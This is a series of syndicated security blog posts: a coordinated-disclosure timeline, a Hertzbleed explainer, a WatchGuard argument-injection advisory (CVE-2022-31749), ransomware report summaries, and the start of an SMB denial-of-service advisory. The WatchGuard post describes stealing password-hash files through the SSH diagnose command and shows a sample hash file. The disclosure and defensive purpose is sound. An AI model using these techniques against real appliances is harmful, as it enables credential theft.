The astute reader will note a significant gap of several months between the fix release and this disclosure. This was a failure on my, Tod Beardsley’s, part, since I was handling this issue.

For the record, there was no intention to bury this vulnerability — after all, we communicated it to the Tomita (the maintainer), RubyGems (who pointed us in the direction of Rubysec, thanks André), CERT/CC, and JPCERT/CC, so hopefully the intention to disclose in a timely manner was and is obvious.

But a confluence of family tragedies and home-office technical disasters conspired with the usual complications of a multi-stakeholder, multi-continent effort to coordinate disclosure in open-source library code.

I am also acutely aware of the irony of this delay in light of my recent post on silent patches, and I offer apologies for that delay. I am committed to being better with backups, both of the data and human varieties.

Note that all dates are local to the United States (some dates may differ in Japan and Germany depending on the time of day).

  • August, 2021: Issue discovered by Hans-Martin Münch of MOGWAI LABS GmbH.
  • Thu, Sep 2, 2021: Issue reported to Rapid7’s security contact as a Metasploit issue, #9286.
  • Tue, Sep 7, 2021: Rapid7 validated the issue, reserved CVE-2021-3779, and contacted the vulnerable gem maintainer, Tomita Masahiro.
  • Tue, Sep 8, 2021: Metasploit Framework temporary remediation committed.
  • Tue, Sep 8, 2021: Notified CERT/CC and RubyGems for disclosure coordination, as the gem appeared to be abandoned by the maintainer given no updates in several years.
  • Tue, Sep 9, 2021: Notified JPCERT/CC through VINCE on CERT/CC’s advice, as VU#541053.
  • Thu, Sep 10, 2021: JPCERT/CC acknowledged the issue and attempted to contact the gem maintainer.
  • Mon, Oct 18, 2021: Maintainer responded to JPCERT/CC, acknowledging the issue.
  • Fri, Oct 22, 2021: Fixed version 2.10.0 released, Rapid7 notified Hans-Martin of the fix.
  • Wed, Feb 16, 2022: CERT/CC asks for an update on the issue, Rapid7 communicates the fix to CERT/CC and JPCERT/CC.
  • Tue, Jun 6, 2022: CERT/CC asks for an update, Rapid7 commits to sharing disclosure documentation.
  • Tue, Jun 14, 2022: Rapid7 shares disclosure details with CERT/CC and Hans-Martin, and asks JPCERT/CC to communicate this document to Tomita.
  • Tue, June 28, 2022: This public disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Hertzbleed explained

Post Syndicated from Yingchen Wang original https://blog.cloudflare.com/hertzbleed-explained/

Hertzbleed explained

Hertzbleed explained

You may have heard a bit about the Hertzbleed attack that was recently disclosed. Fortunately, one of the student researchers who was part of the team that discovered this vulnerability and developed the attack is spending this summer with Cloudflare Research and can help us understand it better.

The first thing to note is that Hertzbleed is a new type of side-channel attack that relies on changes in CPU frequency. Hertzbleed is a real, and practical, threat to the security of cryptographic software.

Should I be worried?

From the Hertzbleed website,

“If you are an ordinary user and not a cryptography engineer, probably not: you don’t need to apply a patch or change any configurations right now. If you are a cryptography engineer, read on. Also, if you are running a SIKE decapsulation server, make sure to deploy the mitigation described below.”

Notice: As of today, there is no known attack that uses Hertzbleed to target conventional and standardized cryptography, such as the encryption used in Cloudflare products and services. Having said that, let’s get into the details of processor frequency scaling to understand the core of this vulnerability.

In short, the Hertzbleed attack shows that, under certain circumstances, dynamic voltage and frequency scaling (DVFS), a power management scheme of modern x86 processors, depends on the data being processed. This means that on modern processors, the same program can run at different CPU frequencies (and therefore take different wall-clock times). For example, we expect that a CPU takes the same amount of time to perform the following two operations because it uses the same algorithm for both. However, there is an observable time difference between them:

Hertzbleed explained

Trivia: Could you guess which operation runs faster?

Before giving the answer we will explain some details about how Hertzbleed works and its impact on SIKE, a new cryptographic algorithm designed to be computationally infeasible for an adversary to break, even for an attacker with a quantum computer.

Frequency Scaling

Suppose a runner is in a long distance race. To optimize the performance, the heart monitors the body all the time. Depending on the input (such as distance or oxygen absorption), it releases the appropriate hormones that will accelerate or slow down the heart rate, and as a result tells the runner to speed up or slow down a little. Just like the heart of a runner, DVFS (dynamic voltage and frequency scaling) is a monitor system for the CPU. It helps the CPU to run at its best under present conditions without being overloaded.

Hertzbleed explained

Just as a runner’s heart causes a runner’s pace to fluctuate throughout a race depending on the level of exertion, when a CPU is running a sustained workload, DVFS modifies the CPU’s frequency from the so-called steady-state frequency. DVFS causes it to switch among multiple performance levels (called P-states) and oscillate among them. Modern DVFS gives the hardware almost full control to adjust the P-states it wants to execute in and the duration it stays at any P-state. These modifications are totally opaque to the user, since they are controlled by hardware and the operating system provides limited visibility and control to the end-user.

The ACPI specification defines P0 state as the state the CPU runs at its maximum performance capability. Moving to higher P-states makes the CPU less performant in favor of consuming less energy and power.

Hertzbleed explained
Suppose a CPU’s steady-state frequency is 4.0 GHz. Under DVFS, frequency can oscillate between 3.9-4.1 GHz.

How long does the CPU stay at each P-state? Most importantly, how can this even lead to a vulnerability? Excellent questions!

Modern DVFS is designed this way because CPUs have a Thermal Design Point (TDP), indicating the expected power consumption at steady state under a sustained workload. For a typical computer desktop processor, such as a Core i7-8700, the TDP is 65 W.

To continue our human running analogy: a typical person can sprint only short distances, and must run longer distances at a slower pace. When the workload is of short duration, DVFS allows the CPU to enter a high-performance state, called Turbo Boost on Intel processors. In this mode, the CPU can temporarily execute very quickly while consuming much more power than TDP allows. But when running a sustained workload, the CPU average power consumption should stay below TDP to prevent overheating. For example, as illustrated below, suppose the CPU has been free of any task for a while, the CPU runs extra hard (Turbo Boost on) when it just starts running the workload. After a while, it realizes that this workload is not a short one, so it slows down and enters steady-state. How much does it slow down? That depends on the TDP. When entering steady-state, the CPU runs at a certain speed such that its current power consumption is not above TDP.

Hertzbleed explained
CPU entering steady state after running at a higher frequency.

Beyond protecting CPUs from overheating, DVFS also wants to maximize the performance. When a runner is in a marathon, she doesn’t run at a fixed pace but rather her pace floats up and down a little. Remember the P-state we mentioned above? CPUs oscillate between P-states just like runners adjust their pace slightly over time. P-states are CPU frequency levels with discrete increments of 100 MHz.

Hertzbleed explained
CPU frequency levels with discrete increments

The CPU can safely run at a high P-state (low frequency) all the time to stay below TDP, but there might be room between its power consumption and the TDP. To maximize CPU performance, DVFS utilizes this gap by allowing the CPU to oscillate between multiple P-states. The CPU stays at each P-state for only dozens of milliseconds, so that its temporary power consumption might exceed or fall below TDP a little, but its average power consumption is equal to TDP.

To understand this, check out this figure again.

Hertzbleed explained

If the CPU only wants to protect itself from overheating, it can run at P-state 3.9 GHz safely. However, DVFS wants to maximize the CPU performance by utilizing all available power allowed by TDP. As a result, the CPU oscillates around the P-state 4.0 GHz. It is never far above or below. When at 4.1 GHz, it overloads itself a little, it then drops to a higher P-state. When at 3.9 GHz, it recovers itself, it quickly climbs to a lower P-state. It may not stay long in any P-state, which avoids overheating when at 4.1 GHz and keeps the average power consumption near the TDP.

This is exactly how modern DVFS monitors your CPU to help it optimize power consumption while working hard.

Again, how can DVFS and TDP lead to a vulnerability? We are almost there!

Frequency Scaling vulnerability

The design of DVFS and TDP can be problematic because CPU power consumption is data-dependent! The Hertzbleed paper gives an explicit leakage model of certain operations identifying two cases.

First, the larger the number of bits set (also known as the Hamming weight) in the operands, the more power an operation takes. The Hamming weight effect is widely observed with no known explanation of its root cause. For example,

Hertzbleed explained

The addition on the left will consume more power compared to the one on the right.

Similarly, when registers change their value there are power variations due to transistor switching. For example, a register switching its value from A to B (as shown in the left) requires flipping only one bit because the Hamming distance of A and B is 1. Meanwhile, switching from C to D will consume more energy to perform six bit transitions since the Hamming distance between C and D is 6.

Hertzbleed explained
Hamming distance

Now we see where the vulnerability is! When running sustained workloads, CPU overall performance is capped by TDP. Under modern DVFS, it maximizes its performance by oscillating between multiple P-states. At the same time, the CPU power consumption is data-dependent. Inevitably, workloads with different power consumption will lead to different CPU P-state distribution. For example, if workload w1 consumes less power than workload w2, the CPU will stay longer in lower P-state (higher frequency) when running w1.

Hertzbleed explained
Different power consumption leads to different P-state distribution

As a result, since the power consumption is data-dependent, it follows that CPU frequency adjustments (the distribution of P-states) and execution time (as 1 Hertz = 1 cycle per second) are data-dependent too.

Consider a program that takes five cycles to finish as depicted in the following figure.

Hertzbleed explained
CPU frequency directly translate to running time

As illustrated in the table below, f the program with input 1 runs at 4.0 GHz (red) then it takes 1.25 nanoseconds to finish. If the program consumes more power with input 2, under DVFS, it will run at a lower frequency, 3.5 GHz (blue). It takes more time, 1.43 nanoseconds, to finish. If the program consumes even more power with input 3, under DVFS, it will run at an even lower frequency of 3.0 GHz (purple). Now it takes 1.67 nanoseconds to finish. This program always takes five cycles to finish, but the amount of power it consumes depends on the input. The power influences the CPU frequency, and CPU frequency directly translates to execution time. In the end, the program’s execution time becomes data-dependent.

Execution time of a five cycles program
Frequency 4.0 GHz 3.5 GHz 3.0 GHz
Execution Time 1.25 ns 1.43 ns 1.67 ns

To give you another concrete example: Suppose we have a sustained workload Foo. We know that Foo consumes more power with input data 1, and less power with input data 2. As shown on the left in the figure below, if the power consumption of Foo is below the TDP, CPU frequency as well as running time stays the same regardless of the choice of input data. However, as shown in the middle, if we add a background stressor to the CPU, the combined power consumption will exceed TDP. Now we are in trouble. CPU overall performance is monitored by DVFS and capped by TDP. To prevent itself from overheating, it dynamically adjusts its P-state distribution when running workload with various power consumption. P-state distribution of Foo(data 1) will have a slight right shift compared to that of Foo(data 2). As shown on the right, CPU running Foo(data 1) results in a lower overall frequency and longer running time. The observation here is that, if data is a binary secret, an attacker can infer data by simply measuring the running time of Foo!

Hertzbleed explained
Complete recap of Hertzbleed. Figure taken from Intel’s documentation.

This observation is astonishing because it conflicts with our expectation of a CPU. We expect a CPU to take the same amount of time computing these two additions.

Hertzbleed explained

However, Hertzbleed tells us that just like a person doing math on paper, a CPU not only takes more power to compute more complicated numbers but also spends more time as well! This is not what a CPU should do while performing a secure computation! Because anyone that measures the CPU execution time should not be able to infer the data being computed on.

This takeaway of Hertzbleed creates a significant problem for cryptography implementations because an attacker shouldn’t be able to infer a secret from program’s running time. When developers implement a cryptographic protocol out of mathematical construction, a goal in common is to ensure constant-time execution. That is, code execution does not leak secret information via a timing channel. We have witnessed that timing attacks are practical: notable examples are those shown by Kocher, Brumley-Boneh, Lucky13, and many others. How to properly implement constant-time code is subject of extensive study.

Historically, our understanding of which operations contribute to time variation did not take DVFS into account. The Hertzbleed vulnerability derives from this oversight: any workload which differs by significant power consumption will also differ in timing. Hertzbleed proposes a new perspective on the development of secure programs: any program vulnerable to power analysis becomes potentially vulnerable to timing analysis!

Which cryptographic algorithms are vulnerable to Hertzbleed is unclear. According to the authors, a systematic study of Hertzbleed is left as future work. However, Hertzbleed was exemplified as a vector for attacking SIKE.

Brief description of SIKE

The Supersingular Isogeny Key Encapsulation (SIKE) protocol is a Key Encapsulation Mechanism (KEM) finalist of the NIST Post-Quantum Cryptography competition (currently at Round 3). The building block operation of SIKE is the calculation of isogenies (transformations) between elliptic curves. You can find helpful information about the calculation of isogenies in our previous blog post. In essence, calculating isogenies amounts to evaluating mathematical formulas that take as inputs points on an elliptic curve and produce other different points lying on a different elliptic curve.

Hertzbleed explained

SIKE bases its security on the difficulty of computing a relationship between two elliptic curves. On the one hand, it’s easy computing this relation (called an isogeny) if the points that generate such isogeny (called the kernel of the isogeny) are known in advance. On the other hand, it’s difficult to know the isogeny given only two elliptic curves, but without knowledge of the kernel points. An attacker has no advantage if the number of possible kernel points to try is large enough to make the search infeasible (computationally intractable) even with the help of a quantum computer.

Similarly to other algorithms based on elliptic curves, such as ECDSA or ECDH, the core of SIKE is calculating operations over points on elliptic curves. As usual, points are represented by a pair of coordinates (x,y) which fulfill the elliptic curve equation

$ y^2= x^3 + Ax^2 +x $

where A is a parameter identifying different elliptic curves.

For performance reasons, SIKE uses one of the fastest elliptic curve models: the Montgomery curves. The special property that makes these curves fast is that it allows working only with the x-coordinate of points. Hence, one can express the x-coordinate as a fraction x = X / Z, without using the y-coordinate at all. This representation simplifies the calculation of point additions, scalar multiplications, and isogenies between curves. Nonetheless, such simplicity does not come for free, and there is a price to be paid.

The formulas for point operations using Montgomery curves have some edge cases. More technically, a formula is said to be complete if for any valid input a valid output point is produced. Otherwise, a formula is not complete, meaning that there are some exceptional inputs for which it cannot produce a valid output point.

Hertzbleed explained

In practice, algorithms working with incomplete formulas must be designed in such a way that edge cases never occur. Otherwise, algorithms could trigger some undesired effects. Let’s take a closer look at what happens in this situation.

A subtle yet relevant property of some incomplete formulas is the nature of the output they produce when operating on points in the exceptional set. Operating with anomalous inputs, the output has both coordinates equal to zero, so X=0 and Z=0. If we recall our basics on fractions, we can figure out that there is something odd in a fraction X/Z = 0/0; furthermore it was always regarded as something not well-defined. This intuition is not wrong, something bad just happened. This fraction does not represent a valid point on the curve. In fact, it is not even a (projective) point.

The domino effect

Hertzbleed explained

Exploiting this subtlety of mathematical formulas makes a case for the Hertzbleed side-channel attack. In SIKE, whenever an edge case occurs at some point in the middle of its execution, it produces a domino effect that propagates the zero coordinates to subsequent computations, which means the whole algorithm is stuck on 0. As a result, the computation gets corrupted obtaining a zero at the end, but what is worse is that an attacker can use this domino effect to make guesses on the bits of secret keys.

Trying to guess one bit of the key requires the attacker to be able to trigger an exceptional case exactly at the point in which the bit is used. It looks like the attacker needs to be super lucky to trigger edge cases when it only has control of the input points. Fortunately for the attacker, the internal algorithm used in SIKE has some invariants that can help to hand-craft points in such a way that triggers an exceptional case exactly at the right point. A systematic study of all exceptional points and edge cases was, independently, shown by De Feo et al. as well as in the Hertzbleed article.

With these tools at hand, and using the DVFS side channel, the attacker can now guess bit-by-bit the secret key by passing hand-crafted invalid input points. There are two cases an attacker can observe when the SIKE algorithm uses the secret key:

  • If the bit of interest is equal to the one before it, no edge cases are present and computation proceeds normally, and the program will take the expected amount of wall-time since all the calculations are performed over random-looking data.
  • On the other hand, if the bit of interest is different from the one before it, the algorithm will enter the exceptional case, triggering the domino effect for the rest of the computation, and the DVFS will make the program run faster as it automatically changes the CPU’s frequency.

Using this oracle, the attacker can query it, learning bit by bit the secret key used in SIKE.

Ok, let’s recap.

SIKE uses special formulas to speed up operations, but if these formulas are forced to hit certain edge cases then they will fail. Failing due to these edge cases not only corrupts the computation, but also makes the formulas output coordinates with zeros, which in machine representation amount to several registers all loaded with zeros. If the computation continues without noticing the presence of these edge cases, then the processor registers will be stuck on 0 for the rest of the computation. Finally, at the hardware level, some instructions can consume fewer resources if operands are zeroed. Because of that, the DVFS behind CPU power consumption can modify the CPU frequency, which alters the steady-state frequency. The ultimate result is a program that runs faster or slower depending on whether it operates with all zeros versus with random-looking data.

Hertzbleed explained

Hertzbleed’s authors contacted Cloudflare Research because they showed a successful attack on CIRCL, our optimized Go cryptographic library that includes SIKE. We worked closely with the authors to find potential mitigations in the early stages of their research. While the embargo of the disclosure was in effect, another research group including De Feo et al. independently described a systematic study of the possible failures of SIKE formulas, including the same attack found by the Hertzbleed team, and pointed to a proper countermeasure. Hertzbleed borrows such a countermeasure.

What countermeasures are available for SIKE?

Hertzbleed explained

The immediate action specific for SIKE is to prevent edge cases from occurring in the first place. Most SIKE implementations provide a certain amount of leeway, assuming that inputs will not trigger exceptional cases. This is not a safe assumption. Instead, implementations should be hardened and should validate that inputs and keys are well-formed.

Enforcing a strict validation of untrusted inputs is always the recommended action. For example, a common check on elliptic curve-based algorithms is to validate that inputs correspond to points on the curve and that their coordinates are in the proper range from 0 to p-1 (as described in Section 3.2.2.1 of SEC 1). These checks also apply to SIKE, but they are not sufficient.

What malformed inputs have in common in the case of SIKE is that input points could have arbitrary order—that is, in addition to checking that points must lie on the curve, they must also have a prescribed order, so they are valid. This is akin to small subgroup attacks for the Diffie-Hellman case using finite fields. In SIKE, there are several overlapping groups in the same curve, and input points having incorrect order should be detected.

The countermeasure, originally proposed by Costello, et al., consists of verifying whether the input points are of the right full-order. To do so, we check whether an input point vanishes only when multiplied by its expected order, and not before when multiplied by smaller scalars. By doing so, the hand-crafted invalid points will not pass this validation routine, which prevents edge cases from appearing during the algorithm execution. In practice, we observed around a 5-10% performance overhead on SIKE decapsulation. The ciphertext validation is already available in CIRCL as of version v1.2.0. We strongly recommend updating your projects that depend on CIRCL to this version, so you can make sure that strict validation on SIKE is in place.

Hertzbleed explained

Closing comments

Hertzbleed shows that certain workloads can induce changes on the frequency scaling of the processor, making programs run faster or slower. In this setting, small differences on the bit pattern of data result in observable differences on execution time. This puts a spotlight on the state-of-the-art techniques we know so far used to protect against timing attacks, and makes us rethink the measures needed to produce constant-time code and secure implementations. Defending against features like DVFS seems to be something that programmers should start to consider too.

Although SIKE was the victim this time, it is possible that other cryptographic algorithms may expose similar symptoms that can be leveraged by Hertzbleed. An investigation of other targets with this brand-new tool in the attacker’s portfolio remains an open problem.

Hertzbleed allowed us to learn more about how the machines we have in front of us work and how the processor constantly monitors itself, optimizing the performance of the system. Hardware manufacturers have focused on performance of processors by providing many optimizations, however, further study of the security of computations is also needed.

If you are excited about this project, at Cloudflare we are working on raising the bar on the production of code for cryptography. Reach out to us if you are interested in high-assurance tools for developers, and don’t forget our outreach programs whether you are a student, a faculty member, or an independent researcher.

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/06/23/cve-2022-31749-watchguard-authenticated-arbitrary-file-read-write-fixed/

CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

A remote and low-privileged WatchGuard Firebox or XTM user can read arbitrary system files when using the SSH interface due to an argument injection vulnerability affecting the diagnose command. Additionally, a remote and highly privileged user can write arbitrary system files when using the SSH interface due to an argument injection affecting the import pac command. Rapid7 reported these issues to WatchGuard, and the vulnerabilities were assigned CVE-2022-31749. On June 23, Watchguard published an advisory and released patches in Fireware OS 12.8.1, 12.5.10, and 12.1.4.

Background

WatchGuard Firebox and XTM appliances are firewall and VPN solutions ranging in form factor from tabletop, rack mounted, virtualized, and “rugged” ICS designs. The appliances share a common underlying operating system named Fireware OS.

At the time of writing, there are more than 25,000 WatchGuard appliances with their HTTP interface discoverable on Shodan. There are more than 9,000 WatchGuard appliances exposing their SSH interface.

In February 2022, GreyNoise and CISA published details of WatchGuard appliances vulnerable to CVE-2022-26318 being exploited in the wild. Rapid7 discovered CVE-2022-31749 while analyzing the WatchGuard XTM appliance for the writeup of CVE-2022-26318 on AttackerKB.

Credit

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vulnerability details

CVE-2022-31749 is an argument injection into the ftpput and ftpget commands. The arguments are injected when the SSH CLI prompts the attacker for a username and password when using the diagnose or import pac commands. For example:

WG>diagnose to ftp://test/test
Name: username
Password: 

The “Name” and “Password” values are not sanitized before they are combined into the “ftpput” and “ftpget” commands and executed via librmisvc.so. Execution occurs using execle, so command injection isn’t possible, but argument injection is. Using this injection, an attacker can upload and download arbitrary files.

File writing turns out to be less useful than an attacker would hope. The problem, from an attacker point of view, is that WatchGuard has locked down much of the file system, and the user can only modify a few directories: /tmp/, /pending/, and /var/run. At the time of writing, we don’t see a way to escalate the file write into code execution, though we wouldn’t rule it out as a possibility.

The low-privileged user file read is interesting because WatchGuard has a built-in low-privileged user named status. This user is intended to “read-only” access to the system. In fact, historically speaking, the default password for this user was “readonly”. Using CVE-2022-31749 this low-privileged user can exfiltrate the configd-hash.xml file, which contains user password hashes when Firebox-DB is in use. Example:

<?xml version="1.0"?>
<users>
  <version>3</version>
  <user name="admin">
    <enabled>1</enabled>
    <hash>628427e87df42adc7e75d2dd5c14b170</hash>
    <domain>Firebox-DB</domain>
    <role>Device Administrator</role>
  </user>
  <user name="status">
    <enabled>1</enabled>
    <hash>dddbcb37e837fea2d4c321ca8105ec48</hash>
    <domain>Firebox-DB</domain>
    <role>Device Monitor</role>
  </user>
  <user name="wg-support">
    <enabled>0</enabled>
    <hash>dddbcb37e837fea2d4c321ca8105ec48</hash>
    <domain>Firebox-DB</domain>
    <role>Device Monitor</role>
  </user>
</users>

The hashes are just unsalted MD4 hashes. @funoverip wrote about cracking these weak hashes using Hashcat all the way back in 2013.

Exploitation

Rapid7 has published a proof of concept that exfiltrates the configd-hash.xml file via the diagnose command. The following video demonstrates its use against WatchGuard XTMv 12.1.3 Update 8.



CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

Remediation

Apply the WatchGuard Fireware updates. If possible, remove internet access to the appliance’s SSH interface. Out of an abundance of caution, changing passwords after updating is a good idea.

Vendor statement

WatchGuard thanks Rapid7 for their quick vulnerability report and willingness to work through a responsible disclosure process to protect our customers. We always appreciate working with external researchers to identify and resolve vulnerabilities in our products and we take all reports seriously. We have issued a resolution for this vulnerability, as well as several internally discovered issues, and advise our customers to upgrade their Firebox and XTM products as quickly as possible. Additionally, we recommend all administrators follow our published best practices for secure remote management access to their Firebox and XTM devices.

Disclosure timeline

March, 2022: Discovered by Jake Baines of Rapid7
Mar 29, 2022: Reported to Watchguard via support phone, issue assigned case number 01676704.
Mar 29, 2022: Watchguard acknowledged follow-up email.
April 20, 2022: Rapid7 followed up, asking for progress.
April 21, 2022: WatchGuard acknowledged again they were researching the issue.
May 26, 2022: Rapid7 checked in on status of the issue.
May 26, 2022: WatchGuard indicates patches should be released in June, and asks about CVE assignment.
May 26, 2022: Rapid7 assigns CVE-2022-31749
June 23, 2022: This disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/06/16/new-report-shows-what-data-is-most-at-risk-to-and-prized-by-ransomware-attackers/

New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers

Ransomware is one of the most pressing and diabolical threats faced by cybersecurity teams today. Gaining access to a network and holding that data for ransom has caused billions in losses across nearly every industry and around the world. It has stopped critical infrastructure like healthcare services in its tracks, putting the lives and livelihoods of many at risk.

In recent years, threat actors have upped the ante by using “double extortion” as a way to inflict maximum pain on an organization. Through this method, not only are threat actors holding data hostage for money – they also threaten to release that data (either publicly or for sale on dark web outlets) to extract even more money from companies.

At Rapid7, we often say that when it comes to ransomware, we may all be targets, but we don’t all have to be victims. We have means and tools to mitigate the impact of ransomware — and one of the most important assets we have on our side is data about ransomware attackers themselves.

Reports about trends in ransomware are pretty common these days. But what isn’t common is information about what kinds of data threat actors prefer to collect and release.

A new report from Rapid7’s Paul Prudhomme uses proprietary data collection tools to analyze the disclosure layer of double-extortion ransomware attacks. He identified the types of data attackers initially disclose to coerce victims into paying ransom, determining trends across industry, and released it in a first-of-its-kind analysis.

“Pain Points: Ransomware Data Disclosure Trends” reveals a story of how ransomware attackers think, what they value, and how they approach applying the most pressure on victims to get them to pay.

The report looks at all ransomware data disclosure incidents reported to customers through our Threat Command threat intelligence platform (TIP). It also incorporates threat intelligence coverage and Rapid7’s institutional knowledge of ransomware threat actors.

From this, we were able to determine:

  • The most common types of data attackers disclosed in some of the most highly affected industries, and how they differ
  • How leaked data differs by threat actor group and target industry
  • The current state of the ransomware market share among threat actors, and how that has changed over time

Finance, pharma, and healthcare

Overall, trends in ransomware data disclosures pertaining to double extortion varied slightly, except in a few key verticals: pharmaceuticals, financial services, and healthcare. In general, financial data was leaked most often (63%), followed by customer/patient data (48%).

However, in the financial services sector, customer data was leaked most of all, rather than financial data from the firms themselves. Some 82% of disclosures linked to the financial services sector were of customer data. Internal company financial data, which was the most exposed data in the overall sample, made up just 50% of data disclosures in the financial services sector. Employees’ personally identifiable information (PII) and HR data were more prevalent, at 59%.

In the healthcare and pharmaceutical sectors, internal financial data was leaked some 71% of the time, more than any other industry — even the financial services sector itself. Customer/patient data also appeared with high frequency, having been released in 58% of disclosures from the combined sectors.

One thing that stood out about the pharmaceutical industry was the prevalence of threat actors to release intellectual property (IP) files. In the overall sample, just 12% of disclosures included IP files, but in the pharma industry, 43% of all disclosures included IP. This is likely due to the high value placed on research and development within this industry.

The state of ransomware actors

One of the more interesting results of the analysis was a clearer understanding of the state of ransomware threat actors. It’s always critical to know your enemy, and with this analysis, we can pinpoint the evolution of ransomware groups, what data the individual groups value for initial disclosures, and their prevalence in the “market.”

For instance, between April and December 2020, the now-defunct Maze Ransomware group was responsible for 30%. This “market share” was only slightly lower than that of the next two most prevalent groups combined (REvil/Sodinokibi at 19% and Conti at 14%). However, the demise of Maze in November of 2020 saw many smaller actors stepping in to take its place. Conti and REvil/Sodinokibi swapped places respectively (19% and 15%), barely making up for the shortfall left by Maze. The top five groups in 2021 made up just 56% of all attacks with a variety of smaller, lesser-known groups being responsible for the rest.

Recommendations for security operations

While there is no silver bullet to the ransomware problem, there are silver linings in the form of best practices that can help to protect against ransomware threat actors and minimize the damage, should they strike. This report offers several that are aimed around double extortion, including:

  • Going beyond backing up data and including strong encryption and network segmentation
  • Prioritizing certain types of data for extra protection, particularly for those in fields where threat actors seek out that data in particular to put the hammer to those organizations the hardest
  • Understanding that certain industries are going to be targets of certain types of leaks and ensuring that customers, partners, and employees understand the heightened risk of disclosures of those types of data and to be prepared for them

To get more insights and view some (well redacted) real-world examples of data breaches, check out the full paper.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Complimentary GartnerⓇ Report “How to Respond to the 2022 Cyberthreat Landscape”: Ransomware Edition

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/06/15/complimentary-gartner-report-how-to-respond-to-the-2022-cyberthreat-landscape-ransomware-edition/

Complimentary GartnerⓇ Report

First things first — if you’re a member of a cybersecurity team bouncing from one stressful identify vulnerability, patch, repeat cycle to another, claim your copy of the GartnerⓇ report “How to Respond to the 2022 Cyberthreat Landscape” right now. It will help you understand the current landscape and better plan for what’s happening now and in the near term.

Ransomware is on the tip of every security professional’s tongue right now, and for good reason. It’s growing, spreading, and evolving faster than many organizations can keep up with. But just because we may all be targets doesn’t mean we have to be victims.

The analysts at Gartner have taken a good, long look at the latest trends in security, with a particular eye toward ransomware, and they had this to say about attacker trends in their report.

Expect attackers to:

  • “Diversify their targets by pursuing lower-profile targets more frequently, using smaller attacks to avoid attention from well-funded nation states.”
  • “Attack critical CPS, particularly when motivated by geopolitical tensions and aligned ransomware actors.”
  • “Optimize ransomware delivery by using ‘known good’ cloud applications, such as enterprise productivity software as a service (SaaS) suites, and using encryption to hide their activities.”
  • “Target individual employees, particularly those working remotely using potentially vulnerable remote access services like Remote Desktop Protocol (RDP) services, or simply bribe employees for access to organizations with a view to launching larger ransomware campaigns.”
  • “Exfiltrate data as part of attempts to blackmail companies into paying ransom or risk data breach disclosure, which may result in regulatory fines and limits the benefits of the traditional mitigation method of ‘just restore quickly.'”
  • “Combine ransomware with other techniques, such as distributed denial of service (DDoS) attacks, to force public-facing services offline until organizations pay a ransom.”

Ransomware is most definitely considered a “top threat,” and it has moved beyond just an IT problem but one that involves governments around the globe. Attackers recognize that the game got a lot bigger with well-funded nations joining the fray to combat it, so their tactics will be targeted, small, diverse, and more frequent to avoid poking the bear(s). Expect to see smaller organizations targeted more often and as part of ransomware-as-a-service campaigns.

Gartner also says that attackers will use RaaS to attack critical infrastructure like CPS more frequently:

“Attackers will aim at smaller targets and deliver ‘ransomware as a service’ to other groups. This will enable more targeted and sophisticated attacks, as the group targeting an organization will have access to ransomware developed by a specialist group. Attackers will also target critical assets, such as CPS.”

Mitigating ransomware

But there are things we can do to mitigate ransomware attacks and push back against the attackers. Gartner suggests several key recommendations, including:

  • “Construct a pre-incident strategy that includes backup (including a restore test), asset management, and restriction of user privileges.”
  • “Build post-incident response procedures by training staff and scheduling regular drills.”
  • “Expand the scope of ransomware protection programs to CPS.”
  • “Increase cross-team training for the nontechnical aspects of a ransomware incident.
  • “Remember that payment of a ransom does not guarantee erasure of exfiltrated data, full recovery of encrypted data, or immediate restoration of operations.”
  • “Don’t rely on cyber insurance only. There is frequently a disconnect between what executive leaders expect a cybersecurity insurance policy to cover and what it actually does cover.”

At Rapid7, we have the risk management, detection and response, and threat intelligence tools your organization needs to not only keep up with the evolution in ransomware threat actors, but to implement best practices of the industry.

If you want to learn more about what cybersecurity threats are out there now and on the horizon, check out the complimentary Gartner report.

Gartner, How to Respond to the 2022 Cyberthreat Landscape, 1 April 2022, by Jeremy D’Hoinne, John Watts, Katell Thielemann

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/06/14/cve-2022-32230-windows-smb-denial-of-service-vulnerability-fixed/

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

A remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer deference within the Windows kernel. We believe this vulnerability would be scored as CVSSv3 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H or 7.5. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.

Credit

This issue was fixed by Microsoft without disclosure in April 2022, but because it was originally classed as a mere stability bug fix, it did not go through the usual security issue process. In May, Spencer McIntyre of Rapid7 discovered this issue while researching the fix for CVE-2022-24500 and determined the security implications of CVE-2022-32230. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

CVE-2022-32230 is caused by a missing check in srv2!Smb2ValidateVolumeObjectsMatch to verify that a pointer is not null before reading a PDEVICE_OBJECT from it and passing it to IoGetBaseFileSystemDeviceObject. The following patch diff shows the function in question for Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

This function is called from the dispatch routine for an SMB2 QUERY_INFO request of the FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION class. Per the docs in MS-SMB2 section 3.3.5.20.1 Handling SMB2_0_INFO_FILE, FILE_NORMALIZED_NAME_INFORMATION is only available when the dialect is 3.1.1.

